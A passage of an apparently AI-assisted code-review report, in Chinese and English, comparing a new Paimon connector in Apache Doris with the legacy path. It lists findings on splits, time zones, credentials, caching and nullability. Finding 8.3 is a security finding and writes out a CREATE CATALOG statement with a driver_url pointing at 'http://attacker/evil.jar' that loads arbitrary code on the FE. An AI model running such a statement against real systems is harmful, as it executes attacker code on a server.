ranges) +- **Difference**: legacy 按 file_split_size / max_initial_split_size / batch-mode 逻辑将每个 native 原始文件切成多个 Doris splits,启用文件内读并行 + 携 per-split weight。新代码每原始文件发出恰一个 [0, file.length()) range 且无 weight。对 paimon offset()==0 的文件(常态),读字节相同 → 结果正确;仅并行/调度降低。 +- **failureScenario**: 对少量超大 ORC/Parquet 原始文件 `SELECT` → 每文件一个 scan range 而非多个 → 扫描并发降低 + split 分配倾斜(无错误结果)。 +- **suggestion**: 在 fe-core PluginDrivenScanNode 层经共享 FileSplitter 路由 native splitting,或让 connector 用 session file-split-size 发出多个 sub-ranges 并设 selfSplitWeight。 + +--- + +### 路径 2. 批式增量读取 (@incr) + +覆盖说明:@incr 端到端两侧追踪。PaimonIncrementalScanParams.validate 经 normalized diff 验证为 legacy validateIncrementalReadParams 的 byte-identical 移植(所有规则、数值边界、closed scanMode enum、case-insensitive-validate/original-case-emit gotcha、only-start-snapshot 拒绝 vs only-start-timestamp Long.MAX_VALUE open-end、empty-params 拒绝、每条错误消息字符串全部一致;唯一变更为 UserException → DorisConnectorException + 行包裹)。两处潜在回退经字节码证据证伪:(1) 剥离的 null reset 键经 AbstractFileStoreTable.copyInternal 反汇编证明在新载 base 表上为 no-op(byte-parity);(2) 发往 BE 的序列化表携 incremental-between* 但经 IncrementalDiffReadProvider.match 反汇编证明 BE read-provider 选择基于 split.beforeFiles()/isStreaming() 而非 table option,故该额外选项 read 时惰性。与 time-travel 互斥保留。 + +**Findings**: 无。 + +--- + +### 路径 3. Time Travel (AS OF) + +#### Finding 3.1 — FOR TIME AS OF datetime-string 在 session time_zone CST/PST/EST 下失败,legacy 成功 + +- **Severity**: MAJOR +- **New**: `fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java:538-547` +- **Legacy**: `fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonUtil.java:660` 和 `fe/fe-core/src/main/java/org/apache/doris/common/util/TimeUtils.java:138` +- **Difference**: connector 经 `ZoneId.of(session.getTimeZone())` 无 alias map 解析非数字 FOR TIME AS OF 字面量,DateTimeException 即响亮失败。Legacy 经 `ZoneId.of(timezone, TimeUtils.timeZoneAliasMap)` 解析同一 session-zone 字符串,其中 CST 和 PRC 映射到 Asia/Shanghai、UTC 和 GMT 映射到 UTC。`ZoneId.of` 恰好拒绝 CST、PST、EST 而 PRC、UTC、GMT 及数字 offset 可解析。时区字符串两侧来源相同,唯一变更是丢弃 alias 解析。CST 是 Doris 默认 region Asia/Shanghai 的 alias,也是合法 SET time_zone 值。 +- **failureScenario**: `SET time_zone = CST` 后 `SELECT ... FOR TIME AS OF` 一个 datetime 字面量。Legacy 解析 CST 为 Asia/Shanghai 并返回 at-or-before snapshot 行。新路径抛 DorisConnectorException 说 CST 非标准 zone id,查询失败。PST、EST 同。 +- **suggestion**: ZoneId.of 前内联映射 closed Doris alias 集:CST 和 PRC → Asia/Shanghai,UTC 和 GMT → UTC。这是 timeZoneAliasMap 仅有的四个条目,小内联常量即可保 no-fe-core-import 规则并恢复 legacy parity,同时仍对真正未知 id 响亮失败。 +- **Verify 裁决**: **CONFIRMED 3 / REFUTED 0 / PARTIAL 0**。三裁均经 JDK harness 实测确认 `ZoneId.of("CST"/"PST"/"EST")` 抛 ZoneRulesException 而带 alias map 可解析;`SET time_zone = CST` 经 checkTimeZoneValidAndStandardize 原样存 "CST";session zone 两侧来源一致(ctx.getSessionVariable().getTimeZone());paimon 在 SPI_READY_TYPES,cutover live。注:代码注释承认这是 deliberate fail-loud KNOWN LIMITATION,但不否认 legacy parity 丢失。 + +--- + +### 路径 4. Branch / Tag 读取 + +覆盖说明:branch/tag/snapshot 读取两侧端到端追踪。两侧匹配:branch-as-distinct-table-identity、3-arg branch Identifier 加载、tag 钉 NAME 非 id、snapshot-id/timestamp 钉 scan.snapshot-id、all-digit FOR VERSION AS OF 当 snapshot id、scan params + table snapshot 互斥、branch 无 in-branch time travel、empty-branch 处理(benign -1 vs 0L schemaId)。not-found 契约故意不同(legacy 在 PaimonUtil 抛 UserException;新返回 Optional.empty 且 fe-core 消费方重抛相同消息,TIMESTAMP 消息文本简化—documented)。 + +#### Finding 4.1 — Branch schema 在 schema-history 分歧下解析对 branch 表(新)vs BASE 表(legacy) + +- **Severity**: MINOR +- **New**: `PaimonConnectorMetadata.java:484-498` 和 :180-197(schemaAt on the branch table) +- **Legacy**: `PaimonExternalTable.java:159-170`(branch schemaId = schemaManager().latest().id orElse 0L)+ initSchema:342-343(对 getBasePaimonTable() 解析 schemaId) +- **Difference**: 新代码从 BRANCH 最新 snapshot 盖 schemaId(snapshotSchemaId(branchTable, latestSnapshotId))并经 schemaAt(branchTable, schemaId) 对 BRANCH 表 schemaManager 解析。Legacy 盖 schemaId = branch dataTable.schemaManager().latest().id()(最新 SCHEMA 版本,若无新 snapshot 注册了新 schema 则可能比最新 snapshot 的 schemaId 更新),然后 initSchema 对 getBasePaimonTable()(BASE 表 schemaManager)解析。两个独立分歧:(a) latest-schema-id vs latest-snapshot's-schema-id;(b) base-table vs branch-table schemaManager。 +- **failureScenario**: schema 历史已与 base 分歧的 branch(如 base {0,1,2},branch {0,3})且最新 snapshot 写于比 schemaManager().latest() 旧的 schema:`@branch('b') SELECT` 可能在两实现间渲染略不同的列集/顺序。实践中是 corner case(branch 通常每新 schema 写新 snapshot 使二 schemaId 相等),不太会浮现;新行为(对 branch 表解析)arguably 更正确。 +- **suggestion**: 正确性无需改动 — 新的自洽 branch-table 解析优于 legacy 跨表查找。若需严格 byte-parity 则 document 为 intentional improvement;否则保持。建议在 parity matrix 加一行注释以免误判为回退。 + +--- + +### 路径 5. 系统表查询 ($snapshots/$schemas/$partitions...) + +覆盖说明:系统表路径两侧追踪,验证 forceJni 路由、TTableType 选择、fail-loud guards、sys-handle identity、enumeration、auth、MVCC 禁用、schema-cache 解析的 parity。forceJni for binlog/audit_log 正确;TTableType 为 HIVE_TABLE;sys-handle identity 正确;MVCC/time-travel 对 sys handle 短路;auth parity。 + +#### Finding 5.1 — Sys-table fetchRowCount 返回 UNKNOWN -1 而非真实行数 + +- **Severity**: MINOR +- **New**: `fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java:436` +- **Legacy**: `fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonSysExternalTable.java:200` +- **Difference**: legacy 规划 sys 表并汇总 split 行数;新路径继承 fetchRowCount 调 getTableStatistics,PaimonConnectorMetadata 未实现故对所有 paimon 表(含 sys 表)返回 -1。 +- **failureScenario**: SHOW TABLE STATUS 和 information_schema.tables 对 t-$snapshots 报 -1 而 legacy 报真实计数。仅统计,与普通表共享,无错行或崩溃。 +- **suggestion**: 在 PaimonConnectorMetadata 实现 getTableStatistics,或 document stats-only 分歧。 + +#### Finding 5.2 — getSupportedSysTables 做冗余 connector handle 往返 vs legacy static map + +- **Severity**: MINOR +- **New**: `PluginDrivenExternalTable.java:392` +- **Legacy**: `PaimonExternalTable.java:392` +- **Difference**: legacy 无条件返回 static supported-sys-tables map;新路径先调 resolveConnectorTableHandle(远程 getTableHandle),handle 缺失则返回 empty,尽管 listSupportedSysTables 忽略 handle 始终返回 SDK list。 +- **failureScenario**: 规划时短暂 base-handle 失败清空 sys-table 集,使 findSysTable 返回 empty,sys 查询作为 generic table-not-found 失败。影响有限 + 每次 sys-table 规划多一次远程调用。 +- **suggestion**: 去掉 getTableHandle 探测直接列名,或 guard 使短暂失败不静默清空。 + +#### Finding 5.3 — Fail-loud sys-table guard 消息文本从 Paimon 改为 Plugin + +- **Severity**: NIT +- **New**: `PluginDrivenScanNode.java:506` +- **Legacy**: `source/PaimonScanNode.java:883` +- **Difference**: 新消息说 Plugin system tables 不支持 scan params 和 time travel;legacy 说 Paimon。条件、顺序、对 getSplits/startSplit 的覆盖相同。 +- **failureScenario**: 对 t-$binlog 的 time-travel/scan-params 仍响亮失败,语义相同;仅名词不同。cosmetic。 +- **suggestion**: 无需动作;可选恢复 connector 名词以求精确 parity。 + +--- + +### 路径 6. 元数据缓存 + +覆盖说明:metadata-caching 路径两侧追踪。REFRESH CATALOG 和 REFRESH TABLE 失效正确到达新 schema cache:plugin-driven paimon catalog 是 PluginDrivenExternalCatalog,经 ExternalMetaCacheRouteResolver 路由到 ENGINE_DEFAULT(正是 PluginDrivenExternalTable schema 缓存所在,getMetaCacheEngine()=="default")。被丢弃的 legacy FE 缓存(table handle、latest-snapshot memoization、schemaId-keyed 二级 schema cache)是粒度/性能降低,使新路径更新鲜而非更陈旧 — 无 refresh-staleness 回退。 + +#### Finding 6.1 — 查询内 schema/partition snapshot 不再原子:schema evolution 下缓存的 latest schema 可与 live re-listed partition/snapshot view 分歧 + +- **Severity**: MINOR +- **New**: `PluginDrivenMvccExternalTable.java:348-362`(getSchemaCacheValue/getLatestSchemaCacheValue)vs :117-142(materializeLatest)和 `PaimonConnectorMetadata.java:336-345`(beginQuerySnapshot) +- **Legacy**: `metacache/paimon/PaimonLatestSnapshotProjectionLoader.java:55-82` + `PaimonTableCacheValue.java:32-44` +- **Difference**: legacy 从一个 memoized PaimonSnapshotCacheValue 派生 latest schema 和 latest partition/snapshot view:resolveLatestSnapshot() 一次读 latestSnapshot(),取其 schemaId,按该 schemaId 载 schema,从同一 table copy 建 partition info — schema 版本与 partition view 是单一一致投影。新代码拆为两个独立读 + 两个 freshness 模型:latest schema 来自 FE 'default' schema cache(仅 nameMapping keyed,TTL/auto-refresh,可能旧版本),partition/MVCC view 来自 live per-query materializeLatest()/beginQuerySnapshot()。schemaId 不再是 cache key 一部分,故 schema-evolved 表可在 TTL 窗口内供旧 schema 而 partition list 反映新 snapshot。 +- **failureScenario**: 分区 paimon 表上跑查询,然后 schema evolve(如 ADD COLUMN)并 externally 加分区(不 REFRESH)。TTL 窗口内 getPartitionColumns()/getFullSchema() 可反映 pre-evolution 列集(stale cached schema)而 getNameToPartitionItems()/MTMVSnapshotIdSnapshot 反映 post-evolution snapshot/partition list。最坏可观察为规划中短暂的列数/分区列不匹配,REFRESH TABLE 或 TTL 过期自愈。(REFRESH TABLE/CATALOG 完全修复 — 失效未丢。) +- **suggestion**: 若需严格 legacy 查询内原子 parity,从 materializeLatest 用的同一 connector snapshot 派生 latest schema(经 beginQuerySnapshot 的 schemaId 在同一往返解析,或对 latest 路径也将 schema 钉入 PluginDrivenMvccSnapshot)使 schema 与 partition view 共享单一时间点;否则 document 为 accepted benign reduction(MINOR)。 + +--- + +### 路径 7. Deletion Vector 读取 + +覆盖说明:两侧 DV-read 流端到端追踪。DV split 规划相同(两侧默认 newScan(),均不用 dropDelete),故 DV 文件发出相同;分歧纯在 native 路径的 DV-file 路径传播。Legacy 在交给 BE 前经 LocationPath.of(deletionFile.path(), storagePropertiesMap).toStorageLocation() 归一化 DV URI(将 oss://, cos://, s3a://, https://s3... 重写为 BE reader 需要的 s3://bucket/key)。 + +#### Finding 7.1 — Native-path deletion-vector 文件路径发往 BE 未归一化 — DV 在 oss:// / cos:// / s3a:// 及 HTTP-style S3 端点上静默丢弃(已删行复现) + +- **Severity**: BLOCKER +- **New**: `PaimonScanPlanProvider.java:240-241`(raw df.path());`PaimonScanRange.java:190-200`(setPath of raw string) +- **Legacy**: `source/PaimonScanNode.java:295-298` +- **Difference**: legacy 在交给 BE 前归一化 DV 文件 URI(LocationPath.of(deletionFile.path(), storagePropertiesMap).toStorageLocation(),含注释 'convert the deletion file uri to make sure FileReader can read it in be')。这重写 scheme/authority(S3PropertyUtils.validateAndNormalizeUri 将 oss://bucket/key, cos://..., s3a://..., https://s3..amazonaws.com/bucket/key 转为 s3://bucket/key)。新路径将 df.path() 原样存入 paimon.deletion_file.path 并直写 TPaimonDeletionFileDesc.setPath,无归一化。connector(不能 import fe-core/LocationPath)和 generic bridge(PluginDrivenScanNode.setScanParams 仅委托 populateRangeParams;PluginDrivenSplit.buildPath 用 NON-normalizing 单参 LocationPath.of)都不恢复。 +- **failureScenario**: DV 启用、存于 Aliyun OSS(或 Tencent COS,或任何 Paimon 报 oss:///cos:///s3a:// 或 HTTP-style S3 端点 URI 的 catalog)的 paimon 表。跑走 native ORC/Parquet 路径的普通 SELECT。BE 收到其 S3 FileReader 无法打开的 DV 路径(legacy 会发 s3://...)。DV 载入失败,故其标记删除的行不被过滤 → 已删行复现(静默错误结果)。 +- **suggestion**: 在路径离开 FE 前归一化为 BE 期望形式。因 connector 不能 import LocationPath:(a) 在 fe-core bridge 内归一化(PluginDrivenScanNode.setScanParams / PaimonScanRange BE-bound desc 经 LocationPath.of(path, storagePropertiesMap).toStorageLocation());或 (b) 加 SPI seam 使 bridge 经 storage-properties map 后处理。同时对 native data-file path 应用同修复(PluginDrivenSplit.buildPath 用 non-normalizing LocationPath.of),legacy 也归一化了(PaimonScanNode.java:443)。 +- **Verify 裁决**: **CONFIRMED 0 / REFUTED 0 / PARTIAL 3** ⚠️ *(三裁全 PARTIAL — 真分歧但失败模式被夸大)*。三个 lens 一致认定:核心 URI 归一化缺失真实存在,但 finding 的 DV-specific *静默*数据损坏框架是错的 —— **同样的未归一化也作用于主数据文件路径**(PaimonScanPlanProvider.java:229 `.path(file.path())` raw → PluginDrivenSplit 单参 LocationPath.of verbatim → FileQueryScanNode.java:568 发 raw 给 BE)。在 oss:///cos:///s3a:// 上主文件与 DV 收到相同的未归一化 scheme,故二者不能独立失败:若 BE S3 reader 拒绝该 scheme,主数据文件读取先失败 → 查询响亮报错或返回空,而非 finding 所述"DV 静默丢弃、已删行复现、legacy 返回正确 post-delete 行"。真实回退存在(整个 native S3-family 非 s3:// scheme 读路径),但属更宽的主路径 + DV 未归一化问题,非 DV-specific 静默正确性 bug。**未降级**(BLOCKER 级别的真分歧仍在),但严重度/场景需重定性。 + +#### Finding 7.2 — VERBOSE EXPLAIN delete-split 计账对 plugin-driven Paimon 丢失(getDeleteFiles 未 override) + +- **Severity**: NIT +- **New**: `PluginDrivenScanNode.java:751-765`(无 getDeleteFiles override) +- **Legacy**: `source/PaimonScanNode.java:337-357` +- **Difference**: legacy override getDeleteFiles(TFileRangeDesc) 返回 DV path,供 FileScanNode.getNodeExplainString(:179-181)计算 deleteSplitNum/deleteFilesSet。bridge PluginDrivenScanNode 不 override,故基类返回 Collections.emptyList()。 +- **failureScenario**: 携 DV 文件的 paimon 查询的 EXPLAIN VERBOSE 现显 deleteSplitNum=0 并从 per-backend 列表省略 delete 文件,尽管 DV 实际 attached + applied。仅诊断,无结果影响。 +- **suggestion**: 在 PluginDrivenScanNode override getDeleteFiles 从 table-format params 读 TPaimonDeletionFileDesc.getPath()(镜像 PaimonScanNode.getDeleteFiles)。 + +--- + +### 路径 8. 多元数据服务接入 (HMS/DLF/REST/Filesystem/JDBC) + +覆盖说明:两侧端到端追踪。CREATE CATALOG(type=paimon)经 SPI_READY_TYPES 路由(paimon 已 whitelisted → LIVE),per-flavor 选项装配 + 校验在纯 PaimonCatalogFactory。关键结构发现:legacy property/metastore/Paimon* 类在新路径仍 live 但仅被 initPreExecutionAuthenticator 用于 ExecutionAuthenticator 与 storage/vended-credential 机制 — 非 catalog-option/HiveConf 装配(connector 独立重建)。验证 clean:flavor 选择、warehouse-required parity、HMS uri alias、DLF endpoint-from-region 派生 + catalog-id=uid fallback + proxyMode/accessPublic 默认、DLF auth no-op、S3 prefix 归一化、generic paimon.* rekey、REST/JDBC option passthrough。 + +#### Finding 8.1 — REST vended credentials 从不下发 BE(数据文件不可读) + +- **Severity**: BLOCKER +- **Legacy**: `source/PaimonScanNode.java:171-176, 650-651`;`PaimonVendedCredentialsProvider.java:49-67` +- **New**: `PaimonScanPlanProvider.java:306-315`;`PluginDrivenScanNode.java:307-317` +- **Difference**: legacy doInitialize() 调 VendedCredentialsFactory.getStoragePropertiesMapWithVendedCredentials(...),对 REST catalog 经 extractRawVendedCredentials → RESTTokenFileIO.validToken() 取 per-table 临时 OSS/S3 token,经 getLocationProperties() 发 BE。新 SPI 路径 paimon 表经 PluginDrivenScanNode,其 getLocationProperties() 仅转发 PaimonScanPlanProvider.getScanNodeProperties() 产的 'location.*' 键,而该方法仅复制 STATIC catalog-level 属性(hadoop./fs./dfs./hive./s3./cos./oss./obs. 前缀)。connector 和 bridge 中零 vended-credential 提取。legacy PaimonScanNode(唯一消费方)因 paimon 在 SPI_READY_TYPES 从不实例化。 +- **failureScenario**: `CREATE CATALOG ... 'type'='paimon','paimon.catalog.type'='rest',...`(无 static oss./s3. 键)对 vend 临时凭据的 REST server。SELECT 任意表:BE 收无有效 OSS/S3 token,文件读失败 access-denied/403,而 legacy 成功。所有 vended-credential REST catalog 数据不可读。 +- **suggestion**: 恢复 SPI 读路径的 vended-credentials 下发:让 connector(或 bridge)对 REST 表取 per-table RESTTokenFileIO.validToken() 并暴露为 location.* scan-node 属性;在此之前将 REST 排出 live SPI 路径。 +- **Verify 裁决**: **CONFIRMED 3 / REFUTED 0 / PARTIAL 0**。三裁确认 cutover live(paimon 加入 SPI_READY_TYPES)、legacy vended 机制真实取凭据、新路径无等价、native ORC/Parquet 默认路径是 BE 消费方。new-code-correctness 补充一处严重度澄清:JNI 路径不破坏(BE PaimonJniScanner 反序列化 serialized_table,RESTTokenFileIO catalogContext/identifier/path/token 为非 transient,BE 侧自服务凭据),故只有 NATIVE-reader-eligible REST 表丢凭据,非 "any table";但 native 读为常见情形,BLOCKER 成立。 + +#### Finding 8.2 — HMS hive.conf.resources(外部 hive-site.xml)在 catalog creation 时静默丢弃 + +- **Severity**: MAJOR +- **Legacy**: `property/metastore/HMSBaseProperties.java:188-197`(loadHiveConfFromFile)消费于 PaimonHMSMetaStoreProperties.buildHiveConfiguration/initializeCatalog(:77-101) +- **New**: `PaimonCatalogFactory.java:363-425`(buildHmsHiveConf) +- **Difference**: legacy 从 CatalogConfigFileUtils.loadHiveConfFromHiveConfDir(hive.conf.resources) 起建 HMS catalog HiveConf,使外部 hive-site.xml 内每个键(custom hive.metastore.*、SASL、kerberos、socket/timeout、ssl)载入用于建 catalog 的 HiveConf。connector buildHmsHiveConf 仅从 raw property map 重建并显式 DEFER 载 hive.conf.resources 文件(仅复制字面 hive.* 属性键 + 固定 auth/timeout 键集)。仍 live 的 legacy PaimonHMSMetaStoreProperties 解析 hive.conf.resources 但仅其 ExecutionAuthenticator 被 SPI 复用,其 HiveConf 丢弃,故文件内容从不达 CatalogFactory.createCatalog。 +- **failureScenario**: `CREATE CATALOG ... 'paimon.catalog.type'='hms','hive.conf.resources'='hive-site.xml'`,该文件携带唯一一份(如 hive.metastore.sasl.qop、custom thrift transport、SSL truststore、metastore URI override)。Legacy 连接成功;新路径这些设置缺失于 catalog HiveConf,致连接/握手失败或对 metastore 行为错误。 +- **suggestion**: 经 ConnectorContext hook 路由 hive.conf.resources 解析(FE 经 CatalogConfigFileUtils 载文件并将解析后键值传入 connector 属性),或让 bridge 合并 legacy-built HiveConf;至少在支持前拒绝设了 hive.conf.resources 的 hms catalog 使丢弃响亮。 +- **Verify 裁决**: **CONFIRMED 3 / REFUTED 0 / PARTIAL 0**。三裁确认路径 LIVE(cutover gate 开)+ 文件内容真实丢弃(buildHmsHiveConf 仅复制 map hive.* 键 + 固定 auth/timeout 键,从不开 hive.conf.resources)+ legacy 经 HMSBaseProperties.checkAndInit 确实载文件入 catalog HiveConf。一处 finding 不准确(已被多裁标注、不改结论):finding 称 legacy PaimonHMSMetaStoreProperties 的 ExecutionAuthenticator 被 SPI 复用,但 connector 零引用 legacy props/HMSBaseProperties,经 ConnectorContext.executeAuthenticated 独立建 auth — 该细节错但与确认的文件丢弃缺陷正交。 + +#### Finding 8.3 — Paimon JDBC driver_url 绕过 FE 安全 allow-list(FE 上加载任意 jar) + +- **Severity**: MAJOR +- **Legacy**: `catalog/JdbcResource.java:300-329`(getFullDriverUrl:格式校验 + checkCloudWhiteList + jdbc_driver_secure_path allow-list),用于 PaimonJdbcMetaStoreProperties.registerJdbcDriver(:190) +- **New**: `PaimonConnector.java:226-241`(resolveFullDriverUrl)和 :243-281(registerJdbcDriver) +- **Difference**: legacy 经 JdbcResource.getFullDriverUrl 解析 driver_url,强制 (a) URL-format 校验、(b) cloud whitelist Config.jdbc_driver_url_white_list、(c) Config.jdbc_driver_secure_path allow-list,对任何非允许 url 抛 IllegalArgumentException。新 resolveFullDriverUrl 无任何检查:原样返回 http(s)://、绝对路径、file:// url,对 jdbc_drivers_dir 解析裸 jar 名,然后 load + DriverManager-register。因 paimon 在 SPI_READY_TYPES 故 user-reachable(与 in-code 'not user-reachable until cutover' 注释相反)。 +- **failureScenario**: `CREATE CATALOG ... 'paimon.catalog.type'='jdbc','jdbc.driver_url'='http://attacker/evil.jar','jdbc.driver_class'='x.Evil',...`。Legacy 拒绝该 url 除非匹配 jdbc_driver_secure_path/white_list;新路径下载并注册任意 driver jar 入 FE JVM,在 DriverManager 执行攻击者代码,无 allow-list 检查。 +- **suggestion**: 经 ConnectorContext 串联 driver-url 校验(已暴露 sanitizeJdbcUrl 和 jdbc_driver_secure_path):将 getFullDriverUrl 的格式 + cloud-whitelist + secure-path 检查移植入 resolveFullDriverUrl,或暴露 ConnectorContext.resolveDriverUrl hook 委托 getFullDriverUrl。强制前勿启用 jdbc driver_url live。 +- **Verify 裁决**: **CONFIRMED 1 / REFUTED 0 / PARTIAL 2** ⚠️ *(混合 — 真分歧但默认配置下不构成可利用绕过)*。legacy-parity lens 判 CONFIRMED:连接器确实丢失三道闸 + URL 格式校验,且 jdbc 兄弟连接器经 preCreateValidation→validateAndResolveDriverPath 走 allow-list 而 paimon 不 override(继承 no-op)。但 new-code-correctness 与 reproducibility 两 lens 判 PARTIAL:**默认配置下 finding 的具体场景不成立** —— `jdbc_driver_secure_path` 默认 "*"(JdbcResource.java:315-316 直接返回 url)、`jdbc_driver_url_white_list` 默认 {}(checkCloudWhiteList no-op),故 legacy 默认也加载 `http://attacker/evil.jar`。唯一无条件丢失的 legacy 控制是 URL 格式校验(拒 ftp://、裸非-.jar 名)。完整的任意-jar 绕过仅在管理员加固配置(非 "*" secure_path 或非空 white_list)时真实存在。操作还需 CREATE CATALOG 权限(admin 级)。真实安全回退(对加固部署 + 无条件丢失格式校验),但 MAJOR 严重度与"legacy 拒绝攻击 url"声明仅在非默认加固配置下成立。 + +#### Finding 8.4 — HMS metastore client socket timeout 忽略配置的非默认值 + +- **Severity**: MINOR +- **Legacy**: `HMSBaseProperties.java:204-208`(用 Config.hive_metastore_client_timeout_second) +- **New**: `PaimonCatalogFactory.java:418-419` +- **Difference**: legacy 将 hive.metastore.client.socket.timeout 默认为 Config.hive_metastore_client_timeout_second(运行时可配 FE config,默认 10s)。connector 在用户未设时硬编码 '10',忽略 FE config。shipped 默认重合,但 operator 改 hive_metastore_client_timeout_second 时新路径静默保 10s。 +- **failureScenario**: operator 设 hive_metastore_client_timeout_second=60 以容忍慢 HMS。Legacy 用 60s;新路径用 10s,可能连慢 metastore 超时。 +- **suggestion**: 经 ConnectorContext.getEnvironment 传 FE config 值并用作默认而非字面 '10'。 + +#### Finding 8.5 — HMS username alias hive.metastore.username 未映射到 hadoop.username + +- **Severity**: MINOR +- **Legacy**: `HMSBaseProperties.java:83-87, 201-203`(hmsUserName from {hive.metastore.username, hadoop.username} → AuthenticationConfig.HADOOP_USER_NAME = 'hadoop.username') +- **New**: `PaimonCatalogFactory.java:384`(copyIfPresent 'hadoop.username' only) +- **Difference**: legacy 接受 hive.metastore.username OR hadoop.username 并写入 hadoop.username 键。connector 仅复制字面存在的 'hadoop.username' 键;以 legacy alias 'hive.metastore.username' 提供 username 的用户在 catalog HiveConf 中无 hadoop.username。 +- **failureScenario**: `'paimon.catalog.type'='hms'` + `'hive.metastore.username'='svc_user'`(simple auth)。Legacy 设 hadoop.username=svc_user;新 connector HiveConf 无 hadoop.username,metastore/HDFS 访问以 FE 进程用户而非 svc_user 进行。 +- **suggestion**: 在 buildHmsHiveConf 经 firstNonBlank(props, 'hive.metastore.username', 'hadoop.username') 取 user name 并设入 'hadoop.username'。 + +--- + +### 路径 9. 多存储系统接入 (S3/OSS/HDFS...) + +覆盖说明:connector 仅归一化 paimon.s3 和 paimon.fs.oss;legacy 将 s3/oss 键译为 fs.s3a/fs.oss。 + +#### Finding 9.1 — s3/oss 凭据从 Paimon FileIO 丢失 + +- **Severity**: BLOCKER +- **New**: `PaimonCatalogFactory.java:328` +- **Legacy**: `AbstractS3CompatibleProperties.java:272` +- **Difference**: 普通 s3/oss 键丢弃 vs legacy fs.s3a/fs.oss map。 +- **failureScenario**: filesystem catalog `s3.access_key`:无凭据,无行。 +- **suggestion**: 在 storage builder 将 s3/oss 映射到 fs.s3a/fs.oss。 +- **Verify 裁决**: **CONFIRMED 3 / REFUTED 0 / PARTIAL 0**。三裁确认 applyStorageConfig(PaimonCatalogFactory.java:328-340)仅识别 USER_STORAGE_PREFIXES(paimon.s3./paimon.s3a./paimon.fs.s3./paimon.fs.oss.)+ raw fs./dfs./hadoop.;普通 s3.access_key/oss.access_key/access_key/AWS_* 落空被丢弃。Legacy 经 StorageProperties.createAll + AbstractS3CompatibleProperties.appendS3HdfsProperties 将这些规范键译为 fs.s3a.* — 新代码仅移植了 legacy 的次级 normalizeS3Config overlay(同 4 前缀),丢失主级 StorageProperties translation。Live-reachable(paimon 在 SPI_READY_TYPES);regression 用例 test_paimon_s3.groovy:70-77 正用 plain `s3.access_key`/`s3.secret_key`/`s3.endpoint`(documented 配置形式)。connector 单测仅覆盖 paimon.* 前缀形式,故盲点。reproducibility 一处精度澄清:现实失败为 FE 侧 auth/access-denied 异常(规划抛错),而非字面 0 行,但核心 claim 成立。 + +#### Finding 9.2 — DLF gate 通过但无 OSS 凭据 + +- **Severity**: BLOCKER +- **New**: `PaimonCatalogFactory.java:505` +- **Legacy**: `PaimonAliyunDLFMetaStoreProperties.java:90` +- **Difference**: buildDlfHiveConf 丢弃 oss.access_key/endpoint。 +- **failureScenario**: DLF `oss.endpoint`:gate 通过但无 fs.oss,读取失败。 +- **suggestion**: 在 DLF overlay 将 oss 映射到 fs.oss。 +- **Verify 裁决**: **CONFIRMED 3 / REFUTED 0 / PARTIAL 0**。三裁确认 buildDlfHiveConf(PaimonCatalogFactory.java:448-490)设 8 个 dlf.catalog.* metastore 键后唯一 OSS-fs 来源是 applyStorageConfig,后者只认 paimon.* 前缀,从不设 fs.oss.impl(JindoOSS)。Gate/translate 不匹配:requireOssStorageForDlf(:505-512)对 oss./fs.oss./paimon.fs.oss. 任一键通过,但规范键集 oss.access_key/oss.secret_key/oss.endpoint/oss.region 被 applyStorageConfig 全丢。Legacy 经 PaimonAliyunDLFMetaStoreProperties.initializeCatalog(:95)overlay ossProps.getHadoopStorageConfig()(无条件合成 fs.oss.impl + fs.oss.accessKeyId/accessKeySecret/endpoint/region,从规范 oss.* alias 绑定)。connector DLF 测试仅用 paimon.fs.oss.* 形式(归一化为 fs.s3a.*),从不覆盖规范 oss.* 形式。new-code-correctness 注:fs.oss.*-前缀键经 fs. 分支部分透传但仍缺 fs.oss.impl/alias 归一化/fs.s3a fallback/disable-cache,规范 oss.* 键完全丢失。 + +#### Finding 9.3 — hdfs.* auth aliases 未传播 + +- **Severity**: MINOR +- **New**: `PaimonCatalogFactory.java:336` +- **Legacy**: `HdfsProperties.java:39` +- **Difference**: hdfs.authentication.* 丢弃,仅复制 fs/dfs/hadoop。 +- **failureScenario**: Kerberized HDFS `hdfs.authentication` 键:auth 失败。 +- **suggestion**: 将 hdfs.* 映射到 hadoop.*。 + +--- + +### 路径 10. 列类型映射 + +覆盖说明:paimon 列类型映射两方向端到端追踪。Scalar 映射(BOOLEAN/.../DECIMAL→DECIMALV3/DATE→DATEV2/TIMESTAMP_*→DATETIMEV2/TIMESTAMP_LTZ→TIMESTAMPTZ gated/BINARY+VARBINARY gated/CHAR>255→STRING/TIME→UNSUPPORTED/VARIANT+MULTISET→UNSUPPORTED)全 round-trip parity。Complex 类型(ARRAY/MAP/STRUCT)递归重建同 Doris-default 容器 nullability。DDL toPaimonType 方向匹配 DorisToPaimonTypeVisitor。以下 findings 为 READ 路径 per-column attribute 传播分歧(scalar/complex TYPE 值本身 clean)。 + +#### Finding 10.1 — Read 路径将 paimon NOT NULL 传播到 Doris 列;legacy 始终强制 nullable + +- **Severity**: MAJOR +- **New**: `PaimonConnectorMetadata.java:945`(mapFields: `boolean nullable = field.type().isNullable()`) +- **Legacy**: `PaimonExternalTable.java:349-354`(和 `PaimonSysExternalTable.java:257-268`):Column(..., isAllowNull = 字面 true, ...) +- **Difference**: legacy 对每个 paimon Doris 列将 isAllowNull 硬编码为字面 true(8-arg Column ctor 的 isAllowNull 位置参为字面 `true`,非 field.type().isNullable())对普通表和系统表都如此。新路径设 isAllowNull = field.type().isNullable():paimon NOT NULL 字段现产 NOT NULL Doris 列。mapFields → ConnectorColumn(nullable=false) → convertColumn → new Column(..., isAllowNull=false);无 fe-core bridge 步骤 re-force nullable。 +- **failureScenario**: paimon 表有 NOT NULL 列但数据仍可对 Doris 呈 null(schema evolution 加列后以旧/新 schema 读、outer-join 产 null、或任何 paimon 写时强制不成立于 Doris 读的字节)。Doris/nereids nullability 驱动的简化可对现 NOT-NULL 列折叠 null-rejecting 谓词(`col IS NULL` → FALSE,或 COALESCE/anti-join 简化),丢行或误评。Legacy(始终 nullable)从不触发该简化,故为结果改变的 parity 回退。 +- **suggestion**: 为 legacy parity,对 paimon read-path 列强制 isAllowNull=true(mapFields 传 nullable=true,或 bridge 对 PAIMON engine 强制)。若意图更精确 nullability,显式 gate 并确认 planner 不会从 NOT NULL 外部列推出错误结果;勿静默改。 +- **Verify 裁决**: **CONFIRMED 3 / REFUTED 0 / 